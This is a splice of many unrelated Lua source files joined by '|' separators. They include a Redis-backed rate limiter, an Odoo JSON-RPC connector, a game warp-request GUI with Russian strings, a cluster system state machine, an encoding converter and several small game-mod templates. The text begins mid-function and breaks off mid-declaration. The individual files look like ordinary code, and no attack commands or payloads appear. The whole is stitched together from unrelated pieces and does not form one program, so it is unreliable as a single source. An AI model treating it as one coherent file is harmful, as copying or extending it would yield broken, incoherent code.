retry = expire_tries <= 2
if retry then
ngx.log(ngx.WARN, '|{"level" : "WARN", "msg" : "' .. FAILED_TO_SET_KEY_EXPIRY .. '", "key": "' .. key .. '", "retry" : "true" }|', last_err)
else
ngx.log(ngx.ERR, '|{"level" : "ERROR", "msg" : "' .. FAILED_TO_SET_KEY_EXPIRY .. '", "key": "' .. key .. '", "retry" : "false" }|', last_err)
end
red_exp:close()
end
end
end
if not_expired then
if is_str(last_err) then
ngx.log(ngx.ERR,'|{"level" : "ERROR", "msg" : "' .. FAILED_TO_SET_KEY_EXPIRY .. '", "key": "' .. key .. '" }|', last_err)
else
ngx.log(ngx.ERR,'|{"level" : "ERROR", "msg" : "' .. FAILED_TO_SET_KEY_EXPIRY .. '", "key": "' .. key .. '" }|')
end
end
end
local function increment_limit(premature,cfg,dict_name,
key,rate,scale,requesttime)
local rate_limited = false
local red, err = _redis_create(cfg.host,cfg.port,
cfg.timeout,cfg.dbid)
if not red then
ngx.log(ngx.ERR, '|{"level" : "ERROR", "msg" : "failed_connecting_to_redis", "incremented_counter":"false", "key" : "' .. key .. '", "host":"' .. cfg.host .. '", "port":"' .. cfg.port .. '" }|', err)
return false
end
local start_of_period = get_start_of_period(scale,requesttime)
local currrent_period_key, previous_period_key = get_keys(scale,key,start_of_period)
red:init_pipeline(2)
red:incr(currrent_period_key)
red:get(previous_period_key)
local results, err = red:commit_pipeline()
if results ~= nil then
ngx.log(ngx.INFO,'|{"level" : "INFO", "incremented_counter" : "true", "key" : "' .. key .. '"}|')
local new_count = results[1]
if new_count == 1 then
ngx.timer.at(0, expire,currrent_period_key,scale,cfg)
else
local res = results[2]
local old_number_of_requests = 0
if res ~= null then
old_number_of_requests = res
end
local elapsed = requesttime - start_of_period
local current_rate = old_number_of_requests * ( (scale - elapsed) / scale) + new_count
ngx.log(ngx.INFO,'|{"level" : "INFO", "key" : "' .. key .. '", "msg" : "current_rate_report", "previous_period_key" : "' .. previous_period_key .. '", "current_period_key" : "' .. currrent_period_key .. '", "number_of_old_requests" : ' .. old_number_of_requests .. ', "number_of_new_requests" : ' .. new_count .. ', "elasped_time_in_current_period" : ' .. elapsed .. ' , "current_rate" : ' .. current_rate .. ', "rate_limit" : ' .. rate .. ' }|')
if current_rate >= rate then
ngx.log(ngx.INFO,'|{"level" : "INFO", "key" : "' .. key .. '" , "msg" : "opening_rate_limit_circuit", "number_of_old_requests" : ' .. old_number_of_requests .. ', "number_of_new_requests" : ' .. new_count .. ', "current_rate" : ' .. current_rate .. ', "rate_limit" : ' .. rate .. ' }|')
open_circuit(dict_name,key,scale - elapsed)
if current_rate > rate then
rate_limited = true
end
end
end
-- put it into the connection pool
local ok, err = red:set_keepalive(cfg.idle_keepalive_ms, cfg.connection_pool_size)
if not ok then
ngx.log(ngx.INFO,'|{"level" : "INFO", "msg" : "failed_returning_connection_to_pool"}|', err)
ok, err = red:close()
if not ok then
ngx.log(ngx.INFO,'|{"level" : "INFO", "msg" : "failed_closing_connection"}|',err)
end
end
else
ngx.log(ngx.ERR,'|{"level" : "ERROR", "msg" : "increment_rate_limit_failure", "incremented_counter" : "false", "key" : "' .. key .. '" }|',err)
ok, err = red:close()
if not ok then
ngx.log(ngx.INFO,'|{"level" : "INFO", "msg" : "failed_closing_connection"}|',err)
end
end
return rate_limited
end
-- local delay, err = lim:incoming(key, redis)
function _M.is_rate_limited(self, key)
local formatted_key = self.zone .. ":" .. key
local dict_name = self.circuit_breaker_dict_name
local cfg = self.cfg
local rate = self.rate
local scale = self.scale
if circuit_is_closed(dict_name,formatted_key) then
if cfg.background then
local ok, err = ngx.timer.at(0, increment_limit,
cfg,
dict_name,formatted_key,
rate,scale,ngx.req.start_time())
if not ok then
ngx.log(ngx.ERR,'|{"level" : "ERROR", "msg" : "increment_rate_limit_call_failure"}|',err)
end
return false
else
return increment_limit(nil,cfg,dict_name,formatted_key,rate,scale,ngx.req.start_time())
end
end
return true
end
return _M
|
local Prop = {}
Prop.Name = "Bazaar Market 4"
Prop.Cat = "Stores"
Prop.Price = 250
Prop.Doors = {
Vector( -12205, -8688.5, 347 ),
Vector( -12147, -8455.5, 347 ),
}
GM.Property:Register( Prop ) |
local skynet = require("skynet")
local exporter = require("fly.prometheus.exporter")
-- https://github.com/apache/incubator-apisix/blob/master/doc/plugins/prometheus-cn.md
-- https://github.com/openresty/lua-nginx-module
-- curl -i http://127.0.0.1:43002/fly/prometheus/metrics
local _M = {}
function _M.init(conf)
exporter.init(conf)
end
function _M.log(var)
exporter.log(var)
end
function _M.collect()
return exporter.collect()
end
function _M.api()
return {
uri = "/fly/prometheus/metrics",
match_method = function(method)
for _, v in ipairs({"GET"}) do
if v == method then
return true
end
end
return false
end,
resp_header = {
content_type = "text/plain"
},
collect = function()
return skynet.call(".prometheus_monitor", "lua", "collect@.prometheus_web")
end
}
end
return _M
|
-- -*- mode: lua; tab-width: 2; indent-tabs-mode: 1; st-rulers: [70] -*-
-- vim: ts=4 sw=4 ft=lua noet
----------------------------------------------------------------------
-- @author Daniel Barney <daniel@pagodabox.com>
-- @copyright 2015, Pagoda Box, Inc.
-- @doc
--
-- @end
-- Created : 15 May 2015 by Daniel Barney <daniel@pagodabox.com>
----------------------------------------------------------------------
local uv = require('uv')
local ffi = require('ffi')
local log = require('logger')
local Cauterize = require('cauterize')
-- local Json = require('Json')
local Plan = require('./plan')
local util = require ('../util')
local Name = require('cauterize/lib/name')
local Group = require('cauterize/lib/group')
local System = Cauterize.Fsm:extend()
local topologies =
{choose_one = true
,nothing = true
,replicated = true
,round_robin = true}
function System:_init(name,system)
-- this might need to be dynamic
self.system = system
self.state = 'disabled'
self.node_id = util.config_get('node_name')
if topologies[self.system.topology] then
self.topology = require('./topology/' .. self.system.topology)
else
error('unknown topology '..self.system.topology)
end
self.name = name
Name.register(self:current(), 'system-' .. name)
Group.join(self:current(),'systems')
self.apply_timeout = nil
-- the the system needs to set it self up, it will have an install
-- script
self:run('install')
-- this should clear out everything that is currently on this node
-- so that we don't have to deal with it being there when it should
-- not be
local elems = self:run('load')
self.nodes = {}
self.node_order = {}
self.plan = Plan:new(elems)
self._on = {}
self:apply()
end
-- create the states for this Fsm
System.disabled = {}
System.enabled = {}
function System.disabled:enable()
log.info('enabling system',self.name)
self.state = 'enabled'
self:run('enable')
self:regen()
end
function System.enabled:disable()
self.state = 'disabled'
self._on = {}
if self.apply_timeout then
self:cancel_timer(self.apply_timeout[1])
self:respond(self.apply_timeout[2],{false,'inturrupted'})
end
self:apply()
self:run('disable')
end
function System:regen()
local ret = System.call('store','fetch','system-' .. self.name)
-- divide it over the alive nodes in the system, and store the
-- results for later
self._on = self.topology(ret[2], self.node_order, self.nodes,
self.node_id)
if self.apply_timeout then
self:cancel_timer(self.apply_timeout[1])
self:respond(self.apply_timeout[2],{false,'inturrupted'})
end
-- then run the plan after a set amount of time has passed
-- we do this incase multiple changes in nodes being up/down come in
-- a small amount of time and can be coalesed into a single change
-- in the plan
self.apply_timeout = {self:send_after('$self', 2000, '$call',
{'apply'}, self._current_call),self._current_call}
end
-- run a set of changes to bring this system to the next step of the
-- plan
function System:apply()
self.plan:next(self._on)
local add, remove = self.plan:changes()
for _,array in pairs({add,remove}) do
for idx,elem in pairs(array) do
array[idx] = elem:get_data()
end
end
log.info('applying new system',{'add',add},{'remove',remove})
for _, elem in pairs(add) do
log.debug('adding', self.name, elem)
self:run('add', elem)
end
for _, elem in pairs(remove) do
log.debug('removing', self.name, elem)
self:run('remove', elem)
end
log.info('system has stabalized', self.name)
return {true}
end
-- run a script for an element of the system
function System:run(name, elem)
local script = self.system[name]
if script then
local data
if elem then
data = elem
end
log.info('going to run', script, data)
local io_pipe = uv.new_pipe(false)
local proc = self:wrap(uv.spawn, script,
{args =
{data,'testing'}
,stdio =
{io_pipe,io_pipe,2}})
assert(self:wrap(uv.read_start, io_pipe) == io_pipe)
local code
local stdout = {}
-- collect run information
repeat
local msg = self:recv({io_pipe,proc})
if msg[1] == io_pipe then
stdout[#stdout + 1] = msg[3]
else
code = msg[2]
break
end
until false
self:close(proc)
self:close(io_pipe)
if code == 0 then
log.debug('result of running script',code,stdout)
else
log.warning('result of running script',code,stdout)
end
end
end
function System:node_important(node,nodes_in_cluster)
local systems = nodes_in_cluster[node].systems
if systems then
for _,name in pairs(systems) do
if name == self.name then
return true
end
end
end
return false
end
local function sort_nodes(nodes,system)
return function (node1,node2)
local node1_priority
local node2_priority
local priorities = nodes[node1].priority
if priorities then
node1_priority = priorities[system]
end
priorities = nodes[node2].priority
if priorities then
node2_priority = priorities[system]
end
if node1_priority and node2_priority then
return node1_priority < node2_priority
elseif node1_priority then
return true
elseif node2_priority then
return false
else
return node1 < node2
end
end
end
-- TODO automatically transitioning to enabled and disabled should be
-- based on a quorum of nodes in the SYSTEM not the cluster. this will
-- allow systems that are partially alive to still function.
-- notify this system that a node came online
function System:up(node)
local nodes_in_cluster = util.config_get('nodes_in_cluster')
if self:node_important(node,nodes_in_cluster) then
if self.nodes[node] == nil then
self.node_order[#self.node_order + 1] = node
table.sort(self.node_order,sort_nodes(nodes_in_cluster,self.name))
end
self.nodes[node] = true
if node == self.node_id then
self:enable()
else
self:regen()
end
self:run('up', node)
end
end
-- notify this system that a node went offline
function System:down(node)
local nodes_in_cluster = util.config_get('nodes_in_cluster')
if self:node_important(node,nodes_in_cluster) then
self.nodes[node] = false
if node == self.node_id then
self:disable()
else
self:regen()
end
self:run('down', node)
end
end
-- If we are not in the correct state, lets return an error
function System:enable()
return {false, 'unable to enable system from state ' .. self.state}
end
function System:disable()
return {false, 'unable to disable system from state ' .. self.state}
end
return System |
local craft = function(itemstack, player, old_craft_grid)
if itemstack:get_name() == "core:ns_node" and old_craft_grid[1]:get_name() == "core:ns_node"
and (old_craft_grid[2]:get_name() == "core:file_node" or old_craft_grid[2]:get_name()
== "core:dir_node") then
local inventory = player:get_inventory()
local ns_meta = old_craft_grid[1]:get_meta()
local ns_ns = ns_meta:get_string("ns")
-- get info from file
local stat_meta = old_craft_grid[2]:get_meta()
local stat_path = stat_meta:get_string("path")
local new_ns = ns_ns .. "bind " .. stat_path .. " " .. stat_path
ns_meta:set_string("ns", new_ns)
ns_meta:set_string("description", new_ns)
inventory:add_item("main", old_craft_grid[1])
itemstack:take_item()
end
end
register.add_craft_handler("core:ns", craft)
|
--Converts ANSI file to UTF-8
--Usage: luajit ansitoutf8.lua inputfile.iss [encoding] > outputfile.iss
--Default encoding is 1252
local ffi = require("ffi")
ffi.cdef[[
int MultiByteToWideChar(unsigned int CodePage, unsigned int dwFlags, const char* lpMultiByteStr, int cbMultiByte, wchar_t* lpWideCharStr, int cchWideChar);
int WideCharToMultiByte(unsigned int CodePage, unsigned int dwFlags, wchar_t* lpWideCharStr, int cchWideChar, char* lpMultiByteStr, int cbMultiByte, char* lpDefaultChar, int* lpUsedDefaultChar);
]]
CP_UTF8 = 65001
function ansitoutf8(str, codepage)
local widestr = ffi.new("wchar_t[?]", 1024)
local utf8str = ffi.new("char[?]", 1024)
local useddc = ffi.new("int[?]", 1)
ffi.C.MultiByteToWideChar(codepage, 0, str, #str, widestr, 1024)
ffi.C.WideCharToMultiByte(CP_UTF8, 0, widestr, -1, utf8str, 1024, nil, useddc)
return ffi.string(utf8str)
end
function removeBOM(s)
if s:sub(1, 3) == string.char(0xEF, 0xBB, 0xBF) then
return s:sub(4)
else
return s
end
end
args = {...}
filename = args[1]
encoding = tonumber(args[2]) or 1252
if filename == nil then
print "Usage: luajit ansitoutf8.lua filename [encoding]"
os.exit()
end
f = io.open(filename, "r")
for l in f:lines() do
io.write(ansitoutf8(removeBOM(l), encoding), "\n")
end
|
local time = ...
if not time then time = 0.5; end
return Def.ActorFrame{
Def.Quad{
InitCommand=function(self)
self:FullScreen():diffuse(color("#000000FF"))
end;
OnCommand=function(self)
self:linear(time):diffusealpha(0)
end;
};
}; |
--[[
-- added by wsh @ 2017-11-30
-- Lua面向对象设计
--]]
--保存类类型的虚表
local _class = {}
-- added by wsh @ 2017-12-09
-- 自定义类型
ClassType = {
class = 1,
instance = 2,
}
function BaseClass(classname, super)
assert(type(classname) == "string" and #classname > 0)
-- 生成一个类类型
local class_type = {}
-- 在创建对象的时候自动调用
class_type.__init = false
class_type.__delete = false
class_type.__cname = classname
class_type.__ctype = ClassType.class
class_type.super = super
class_type.New = function(...)
-- 生成一个类对象
local obj = {}
obj._class_type = class_type
obj.__ctype = ClassType.instance
-- 在初始化之前注册基类方法
setmetatable(obj, {
__index = _class[class_type],
})
-- 调用初始化方法
do
local create
create = function(c, ...)
if c.super then
create(c.super, ...)
end
if c.__init then
c.__init(obj, ...)
end
end
create(class_type, ...)
end
-- 注册一个delete方法
obj.Delete = function(self)
local now_super = self._class_type
while now_super ~= nil do
if now_super.__delete then
now_super.__delete(self)
end
now_super = now_super.super
end
end
return obj
end
local vtbl = {}
_class[class_type] = vtbl
setmetatable(class_type, {
__newindex = function(t,k,v)
vtbl[k] = v
end
,
--For call parent method
__index = vtbl,
})
if super then
setmetatable(vtbl, {
__index = function(t,k)
local ret = _class[super][k]
--do not do accept, make hot update work right!
--vtbl[k] = ret
return ret
end
})
end
return class_type
end
|
exports.name = "Luvit Odoo Connector"
exports.version = "0.0.1"
local http = require("http")
local table = require("table")
local rpc = require("json-rpc")
local string = require("string")
string.split = function(inputstr, sep)
if sep == nil then
sep = "%s"
end
local t={} ; i=1
for str in string.gmatch(inputstr, "([^"..sep.."]+)") do
t[i] = str
i = i + 1
end
return t
end
exports.new = function(config)
local this = {}
config = config or {}
this.host = config.host
this.port = config.port or 80
this.db = config.db
this.user = config.user
this.pw = config.pw
this.connect = function(self, cb)
local params = {
db = self.db,
login = self.user,
password = self.pw
}
local options = {
host = self.host,
port = self.port,
path = "/web/session/authenticate",
data = {
db = self.db,
login = self.user,
password = self.pw
}
}
rpc.request(options, function(err, res)
if err then return cb(err) end
if res.error then return cb(res.error) end
self.uid = res.result.uid
self.session_id = res.result.session_id
self.sid = "session_id=" .. self.session_id
self.context = res.result.user_context
cb(nil, res.result)
end)
return self
end
this.request = function(self, path, params, cb)
local params = params or {}
local options = {
host = self.host,
port = self.port,
path = path or "/",
data = params,
headers = {Cookie = self.sid .. ";"}
}
rpc.request(options, function(err, res)
if err then
return cb(err)
end
cb(nil, res)
end)
return self
end
this.get = function(self, model, id, cb)
self:request("/web/dataset/call", {
method = "read",
model = model,
args = {id}
}, cb)
end
this.create = function(self, model, params, cb)
self:request("/web/dataset/call_kw", {
kwargs = {
context = self.context
},
method = "create",
model = model,
args = {params}
}, cb)
end
this.update = function(self, model, id, params, cb)
self:request("/web/dataset/call_kw", {
kwargs = {
context = self.context
},
method = "write",
model = model,
args = {{id}, params}
}, cb)
end
this.delete = function(self, model, id, cb)
self:request("/web/dataset/call_kw", {
kwargs = {
context = self.context
},
method = "unlink",
model = model,
args = {{id}}
}, cb)
end
this.search = function(self, model, params, cb)
self:request("/web/dataset/call_kw", {
kwargs = {
context = self.context
},
method = "search",
model = model,
args = {params}
}, cb)
end
return this
end |
local this = {}
function this.getFailureString(container)
return "You failed to harvest anything of value."
end
function this.getSuccessString(container, ingredient, quantity)
return string.format("You harvested %s %s.", quantity, ingredient.name)
end
return this
|
class 'WarpGui'
function WarpGui:__init()
self.actions = {
[3] = true,
[4] = true,
[5] = true,
[6] = true,
[11] = true,
[12] = true,
[13] = true,
[14] = true,
[17] = true,
[18] = true,
[105] = true,
[137] = true,
[138] = true,
[139] = true,
[16] = true
}
self.cooldown = 15
timer = Timer()
self.cooltime = 0
self.tag = "[Телепорт] "
self.w = "Подождите "
self.ws = " секунд, чтобы вновь отправить запрос!"
self.gonnawarp = " хотел бы телепортироваться к вам. Нажмите 'B' и зайдите в меню 'Телепортация', чтобы принять."
self.textColor = Color( 200, 50, 200 )
self.rows = {}
self.acceptButtons = {}
self.whitelistButtons = {}
self.whitelist = {}
self.whitelistAll = false
self.warpRequests = {}
self.windowShown = false
self.warping = true
self.window = Window.Create()
self.window:SetVisible( self.windowShown )
self.window:SetTitle( "▧ Телепорт к игрокам" )
self.window:SetSizeRel( Vector2( 0.35, 0.7 ) )
self.window:SetMinimumSize( Vector2( 400, 200 ) )
self.window:SetPositionRel( Vector2( 0.75, 0.5 ) - self.window:GetSizeRel()/2 )
self.window:Subscribe( "WindowClosed", self, self.Close )
self.playerList = SortedList.Create( self.window )
self.playerList:SetMargin( Vector2.Zero, Vector2( 0, 4 ) )
self.playerList:SetBackgroundVisible( false )
self.playerList:AddColumn( "Игрок" )
self.playerList:AddColumn( "Телепорт к", Render:GetTextWidth( "Телепорт к" ) + 10 )
self.playerList:AddColumn( "Запросы", Render:GetTextWidth( "Запросы" ) + 15 )
self.playerList:AddColumn( "Авто-ТП", Render:GetTextWidth( "Авто-ТП" ) + 10 )
self.playerList:SetButtonsVisible( true )
self.playerList:SetDock( GwenPosition.Fill )
self.filter = TextBox.Create( self.window )
self.filter:SetDock( GwenPosition.Bottom )
self.filter:SetSize( Vector2( self.window:GetSize().x, 32 ) )
self.filter:SetToolTip( "Поиск" )
self.filter:Subscribe( "TextChanged", self, self.TextChanged )
self.filter:Subscribe( "Focus", self, self.Focus )
self.filter:Subscribe( "Blur", self, self.Blur )
self.whitelistAllCheckbox = LabeledCheckBox.Create( self.window )
self.whitelistAllCheckbox:SetDock( GwenPosition.Top )
self.whitelistAllCheckbox:GetLabel():SetText( "Разрешить Авто-ТП всем" )
self.whitelistAllCheckbox:GetLabel():SetTextSize( 15 )
self.whitelistAllCheckbox:GetCheckBox():Subscribe( "CheckChanged", function() self.whitelistAll = self.whitelistAllCheckbox:GetCheckBox():GetChecked() end )
self.blacklistAllCheckbox = LabeledCheckBox.Create( self.window )
self.blacklistAllCheckbox:SetDock( GwenPosition.Top )
self.blacklistAllCheckbox:GetLabel():SetText( "Не беспокоить" )
self.blacklistAllCheckbox:GetLabel():SetTextSize( 15 )
self.blacklistAllCheckbox:GetCheckBox():Subscribe( "CheckChanged", function() self.warping = not self.warping end )
-- Add players
for player in Client:GetPlayers() do
self:AddPlayer( player )
end
--self:AddPlayer(LocalPlayer)
Events:Subscribe( "Lang", self, self.Lang )
Events:Subscribe( "LocalPlayerChat", self, self.LocalPlayerChat )
Events:Subscribe( "PlayerJoin", self, self.PlayerJoin )
Events:Subscribe( "PlayerQuit", self, self.PlayerQuit )
Events:Subscribe( "OpenWarpGUI", self, self.OpenWarpGUI )
Events:Subscribe( "CloseWarpGUI", self, self.CloseWarpGUI )
Events:Subscribe( "Render", self, self.Render )
Network:Subscribe( "WarpRequestToTarget", self, self.WarpRequest )
Network:Subscribe( "WarpReturnWhitelists", self, self.WarpReturnWhitelists )
Network:Subscribe( "WarpDoPoof", self, self.WarpDoPoof )
-- Load whitelists from server
Network:Send( "WarpGetWhitelists", LocalPlayer )
end
function WarpGui:Lang()
self.tag = "[Teleport] "
self.w = "Wait "
self.ws = " seconds to send the request again!"
self.gonnawarp = " sent you a teleport request. Press 'B' and go to the 'Teleportation' menu to accept."
self.window:SetTitle( "▧ Teleport to players" )
self.whitelistAllCheckbox:GetLabel():SetText( "Allow Auto-TP for all" )
self.blacklistAllCheckbox:GetLabel():SetText( "Do not disturb" )
end
-- Player adding
function WarpGui:CreateListButton( text, enabled, listItem )
local buttonBackground = Rectangle.Create( listItem )
buttonBackground:SetSizeRel( Vector2( 0.5, 1.0 ) )
buttonBackground:SetDock( GwenPosition.Fill )
buttonBackground:SetColor( Color( 0, 0, 0, 100 ) )
local button = Button.Create( listItem )
button:SetText( text )
button:SetTextSize( 13 )
button:SetDock( GwenPosition.Fill )
button:SetEnabled( enabled )
return button
end
function WarpGui:AddPlayer( player )
local playerId = tostring(player:GetSteamId().id)
local playerName = player:GetName()
local playerColor = player:GetColor()
local item = self.playerList:AddItem( playerId )
if LocalPlayer:IsFriend( player ) then
item:SetToolTip( "Друг" )
end
local warpToButton = self:CreateListButton( "Телепорт ≫", true, item )
warpToButton:Subscribe( "Press", function() self:WarpToPlayerClick(player) end )
local acceptButton = self:CreateListButton( "Принять √", false, item )
acceptButton:Subscribe( "Press", function() self:AcceptWarpClick(player) end )
self.acceptButtons[playerId] = acceptButton
local whitelist = self.whitelist[playerId]
local whitelistButtonText = "-"
if whitelist ~= nil then
if whitelist == 1 then whitelistButtonText = "Вкл"
elseif whitelist == 2 then whitelistButtonText = "Заблок."
end
end
local whitelistButton = self:CreateListButton( whitelistButtonText, true, item )
whitelistButton:Subscribe( "Press", function() self:WhitelistClick(playerId, whitelistButton) end )
self.whitelistButtons[playerId] = whitelistButton
item:SetCellText( 0, playerName )
item:SetCellContents( 1, warpToButton )
item:SetCellContents( 2, acceptButton )
item:SetCellContents( 3, whitelistButton )
item:SetTextColor( playerColor )
self.rows[playerId] = item
-- Add is serch filter matches
local filter = self.filter:GetText():lower()
if filter:len() > 0 then
item:SetVisible( true )
end
end
-- Player search
function WarpGui:TextChanged()
local filter = self.filter:GetText()
if filter:len() > 0 then
for k, v in pairs( self.rows ) do
v:SetVisible( self:PlayerNameContains(v:GetCellText( 0 ), filter) )
end
else
for k, v in pairs( self.rows ) do
v:SetVisible( true )
end
end
end
function WarpGui:PlayerNameContains( name, filter )
return string.match(name:lower(), filter:lower()) ~= nil
end
function WarpGui:WarpToPlayerClick( player )
ClientEffect.Play(AssetLocation.Game, {
effect_id = 383,
position = Camera:GetPosition(),
angle = Angle()
})
local time = Client:GetElapsedSeconds()
if time < self.cooltime then
self:SetWindowVisible( false )
Events:Unsubscribe( self.LocalPlayerInputEvent )
Events:Fire( "CastCenterText", { text = self.w .. math.ceil(self.cooltime - time) .. self.ws, time = 6, color = Color.Red } )
return
end
Network:Send( "WarpRequestToServer", {requester = LocalPlayer, target = player} )
Events:Unsubscribe( self.LocalPlayerInputEvent )
timer:Restart()
self:SetWindowVisible( false )
self.cooltime = time + self.cooldown
return false
end
function WarpGui:AcceptWarpClick( player )
local playerId = tostring(player:GetSteamId().id)
if self.warpRequests[playerId] == nil then
Chat:Print( self.tag, Color.White, player:GetName() .. " не просил вас телепортироваться.", self.textColor )
return
else
local acceptButton = self.acceptButtons[playerId]
if acceptButton == nil then return end
self.warpRequests[playerId] = nil
acceptButton:SetEnabled( false )
Network:Send( "WarpTo", {requester = player, target = LocalPlayer} )
self:SetWindowVisible( false )
Events:Unsubscribe( self.LocalPlayerInputEvent )
end
end
-- Warp request
function WarpGui:WarpRequest( args )
if self.warping then
local requestingPlayer = args
local playerId = tostring(requestingPlayer:GetSteamId().id)
local whitelist = self.whitelist[playerId]
if whitelist == 1 or self.whitelistAll then -- In whitelist and not in blacklist
Network:Send( "WarpTo", {requester = requestingPlayer, target = LocalPlayer} )
elseif whitelist == 0 or whitelist == nil then -- Not in whitelist
local acceptButton = self.acceptButtons[playerId]
if acceptButton == nil then return end
acceptButton:SetEnabled( true )
self.warpRequests[playerId] = true
if LocalPlayer:GetWorld() ~= DefaultWorld then
Network:Send( "WarpMessageTo", {target = requestingPlayer, message = "Игрок " .. LocalPlayer:GetName() .. " сейчас в мини-игре, но сможет принять запрос на телепортацию позже."} )
Chat:Print( self.tag, Color.White, requestingPlayer:GetName() .. " хотел бы телепортироваться к вам, вы можете принять запрос на телепортацию позже, нажав B.", self.textColor )
return
end
Network:Send( "WarpMessageTo", {target = requestingPlayer, message = "Запрос на телепортацию отправлен к " .. LocalPlayer:GetName() .. ". Ожидайте принятия запроса."} )
Chat:Print( self.tag, Color.White, requestingPlayer:GetName() .. self.gonnawarp, self.textColor )
if not self.PostTickEvent then
self.PostTickEvent = Events:Subscribe( "PostTick", self, self.PostTick )
self.RefreshTimer = Timer()
else
self.RefreshTimer:Restart()
end
end
else
Chat:Print( self.tag, Color.White, "Игрок в режиме не беспокоить.", self.textColor )
end
end
function WarpGui:PostTick()
if self.RefreshTimer:GetSeconds() <= 30 then return end
self:refreshList()
self.RefreshTimer = nil
if self.PostTickEvent then
Events:Unsubscribe( self.PostTickEvent )
self.PostTickEvent = nil
end
end
-- White/black -list click
function WarpGui:WhitelistClick( playerId, button )
local currentWhiteList = self.whitelist[playerId]
if currentWhiteList == 0 or currentWhiteList == nil then -- Currently none, set whitelisted
self:SetWhitelist( playerId, 1, true )
elseif currentWhiteList == 1 then -- Currently whitelisted, blacklisted
self:SetWhitelist( playerId, 2, true )
elseif currentWhiteList == 2 then -- Currently blacklisted, set none
self:SetWhitelist( playerId, 0, true )
end
end
function WarpGui:SetWhitelist( playerId, whitelisted, sendToServer )
if self.whitelist[playerId] ~= whitelisted then self.whitelist[playerId] = whitelisted end
local whitelistButton = self.whitelistButtons[playerId]
if whitelistButton == nil then return end
if whitelisted == 0 then
whitelistButton:SetText( "-" )
whitelistButton:SetTextSize( 13 )
elseif whitelisted == 1 then
whitelistButton:SetText( "Вкл" )
whitelistButton:SetTextSize( 13 )
elseif whitelisted == 2 then
whitelistButton:SetText( "Заблок." )
whitelistButton:SetTextSize( 13 )
end
if sendToServer then
Network:Send( "WarpSetWhitelist", {playerSteamId = LocalPlayer:GetSteamId().id, targetSteamId = playerId, whitelist = whitelisted} )
end
end
function WarpGui:WarpReturnWhitelists( whitelists )
for i = 1, #whitelists do
local targetSteamId = whitelists[i].target_steam_id
local whitelisted = whitelists[i].whitelist
self:SetWhitelist( targetSteamId, tonumber(whitelisted), false )
end
end
function WarpGui:LocalPlayerChat( args )
local message = args.text
local commands = {}
for command in string.gmatch(message, "[^%s]+") do
table.insert(commands, command)
end
if commands[1] ~= "/warp" then return true end
if #commands == 1 then -- No extra commands, show window and return
if LocalPlayer:GetWorld() ~= DefaultWorld then return end
self:SetWindowVisible( not self.windowShown )
if self.windowShown then
self.LocalPlayerInputEvent = Events:Subscribe( "LocalPlayerInput", self, self.LocalPlayerInput )
ClientEffect.Play(AssetLocation.Game, {
effect_id = 382,
position = Camera:GetPosition(),
angle = Angle()
})
else
Events:Unsubscribe( self.LocalPlayerInputEvent )
ClientEffect.Play(AssetLocation.Game, {
effect_id = 383,
position = Camera:GetPosition(),
angle = Angle()
})
end
return false
end
local warpNameSearch = table.concat(commands, " ", 2)
for player in Client:GetPlayers() do
if (self:PlayerNameContains( player:GetName(), warpNameSearch) ) then
self:WarpToPlayerClick( player )
return false
end
end
return false
end
function WarpGui:WarpDoPoof( position )
ClientEffect.Play( AssetLocation.Game, {effect_id = 250, position = position, angle = Angle()} )
end
-- Window management
function WarpGui:LocalPlayerInput( args )
if args.input == Action.GuiPause then
self:SetWindowVisible( false )
Events:Unsubscribe( self.LocalPlayerInputEvent )
end
if self.focused then
return false
else
if self.actions[args.input] then
return false
end
end
end
function WarpGui:Focus()
self.focused = true
end
function WarpGui:Blur()
self.focused = nil
end
function WarpGui:OpenWarpGUI()
if Game:GetState() ~= GUIState.Game then return end
ClientEffect.Play(AssetLocation.Game, {
effect_id = 382,
position = Camera:GetPosition(),
angle = Angle()
})
if LocalPlayer:GetWorld() ~= DefaultWorld then return end
self:SetWindowVisible( not self.windowShown )
if self.windowShown then
self.LocalPlayerInputEvent = Events:Subscribe( "LocalPlayerInput", self, self.LocalPlayerInput )
else
Events:Unsubscribe( self.LocalPlayerInputEvent )
end
end
function WarpGui:CloseWarpGUI()
if Game:GetState() ~= GUIState.Game then return end
if LocalPlayer:GetWorld() ~= DefaultWorld then return end
if self.window:GetVisible() == true then
self:SetWindowVisible( false )
Events:Unsubscribe( self.LocalPlayerInputEvent )
end
end
function WarpGui:PlayerJoin( args )
local player = args.player
self:AddPlayer( player )
end
function WarpGui:PlayerQuit( args )
local player = args.player
local playerId = tostring(player:GetSteamId().id)
if self.rows[playerId] == nil then return end
self.playerList:RemoveItem(self.rows[playerId])
self.rows[playerId] = nil
end
function WarpGui:Render()
local is_visible = self.windowShown and (Game:GetState() == GUIState.Game)
if self.window:GetVisible() ~= is_visible then
self.window:SetVisible( is_visible )
end
if self.active then
Mouse:SetVisible( true )
end
end
function WarpGui:SetWindowVisible( visible )
if self.windowShown ~= visible then
self.windowShown = visible
self.window:SetVisible( visible )
Mouse:SetVisible( visible )
if LocalPlayer:GetValue( "SystemFonts" ) then
self.whitelistAllCheckbox:GetLabel():SetFont( AssetLocation.SystemFont, "Impact" )
self.blacklistAllCheckbox:GetLabel():SetFont( AssetLocation.SystemFont, "Impact" )
end
end
end
function WarpGui:Close()
self:SetWindowVisible( false )
Events:Unsubscribe( self.LocalPlayerInputEvent )
ClientEffect.Play(AssetLocation.Game, {
effect_id = 383,
position = Camera:GetPosition(),
angle = Angle()
})
end
function WarpGui:refreshList()
self.playerList:Clear()
self.playerToRow = {}
for player in Client:GetPlayers() do
self:AddPlayer( player )
end
--self:AddPlayer(LocalPlayer)
end
warpGui = WarpGui() |
project("RED4ext.Loader")
targetname("d3d11")
targetdir(red4ext.paths.build("bin"))
kind("SharedLib")
language("C++")
pchheader("stdafx.hpp")
pchsource("stdafx.cpp")
dependson({ "RED4ext.Dll" })
-- Remove these defines, else Resource Compiler will cry.
removedefines({
"WINVER=*",
"_WIN32_WINNT=*"
})
defines(
{
"WINVER=0x0A00",
"_WIN32_WINNT=0x0A00"
})
includedirs(
{
".",
red4ext.project.includes("fmt"),
red4ext.paths.deps("wil", "include")
})
files(
{
"**.cpp",
"**.hpp",
"**.def",
"**.rc"
})
links(
{
red4ext.project.links("fmt")
})
|
object_intangible_pet_beast_master_bm_spiderclan_consort = object_intangible_pet_beast_master_shared_bm_spiderclan_consort:new {
}
ObjectTemplates:addTemplate(object_intangible_pet_beast_master_bm_spiderclan_consort, "object/intangible/pet/beast_master/bm_spiderclan_consort.iff")
|
local translatedChatMessage
local next_file_load
local send_bot_room_crash
local file_id
local webhooks = {_count = 0}
local runtime = 0
local room = tfm.get.room
local onEvent
do
